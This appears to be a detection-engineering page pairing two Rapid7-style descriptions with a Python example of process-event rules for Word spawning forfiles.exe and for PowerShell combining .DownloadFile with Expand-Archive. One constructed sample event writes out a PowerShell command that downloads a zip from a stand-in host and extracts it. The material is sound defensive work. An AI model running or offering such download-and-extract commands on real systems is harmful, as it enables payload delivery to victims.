This detection identifies ‘ForFiles.exe’ being spawned as a child process of ‘Word.exe’. Malicious actors send malicious documents to targets that retrieve and execute malware from external locations when opened.

This detection identifies the use of ‘PowerShell.exe’ with ‘.DownloadFile’ and ‘Expand-Archive’ passed to it via the command line. Rapid7 has observed malicious actors using this technique…
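The two detection descriptions above, expressed as rules over process-creation telemetry, as an added example (it is not Rapid7's detection logic and not code from the page). It assumes Sysmon Event ID 1 style field names (`ParentImage`, `Image`, `CommandLine`), matches the Word parent as either the page's ‘Word.exe’ or the actual Office binary name `WINWORD.EXE` (the latter is an addition here), and runs over a handful of constructed sample events:

```python
import ntpath

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# These are illustrative records written for this example, not real telemetry.
SAMPLE_EVENTS = [
    {   # Word spawning forfiles.exe: should match rule 1
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\forfiles.exe",
        "CommandLine": r'forfiles /p C:\Users\Public /m *.txt /c "cmd /c echo @file"',
    },
    {   # PowerShell with both .DownloadFile and Expand-Archive: should match rule 2
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (
            r'powershell.exe -nop -c "(New-Object Net.WebClient).DownloadFile('
            r"'https://example.invalid/p.zip','C:\Users\Public\p.zip'); "
            r'Expand-Archive C:\Users\Public\p.zip C:\Users\Public\p"'
        ),
    },
    {   # Admin extracting a local archive: Expand-Archive alone is not enough
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -c "Expand-Archive D:\backup.zip D:\restore"',
    },
    {   # forfiles.exe launched from a scheduled cmd.exe, not from Word
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\forfiles.exe",
        "CommandLine": r'forfiles /p C:\Logs /d -30 /c "cmd /c del @path"',
    },
]


def image_name(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def rule_forfiles_child_of_word(event):
    """Rule 1: forfiles.exe whose parent process is Word.

    'word.exe' is the name used on the page; 'winword.exe' is the real Office
    executable name and is included here as an addition.
    """
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    return parent in {"word.exe", "winword.exe"} and child == "forfiles.exe"


def rule_powershell_downloadfile_expand_archive(event):
    """Rule 2: powershell.exe whose command line carries BOTH .DownloadFile and Expand-Archive.

    Substring matching is case-insensitive; note that string-splitting or
    encoded-command obfuscation would not be caught by this simple check.
    """
    if image_name(event.get("Image", "")) != "powershell.exe":
        return False
    cmdline = event.get("CommandLine", "").lower()
    return ".downloadfile" in cmdline and "expand-archive" in cmdline


RULES = {
    "forfiles_child_of_word": rule_forfiles_child_of_word,
    "powershell_downloadfile_expand_archive": rule_powershell_downloadfile_expand_archive,
}


def evaluate(events):
    """Return (event_index, rule_name) pairs for every rule that fires on each event."""
    hits = []
    for idx, event in enumerate(events):
        for name, rule in RULES.items():
            if rule(event):
                hits.append((idx, name))
    return hits


if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{name}] parent={image_name(ev['ParentImage'])} "
              f"image={image_name(ev['Image'])} cmd={ev['CommandLine'][:60]}...")
```

Both rules are intentionally narrow: rule 1 keys on the parent/child pair rather than the forfiles arguments, so it also fires on benign-looking command lines launched from Word, while rule 2 requires both tokens so that routine archive extraction by an administrator does not alert.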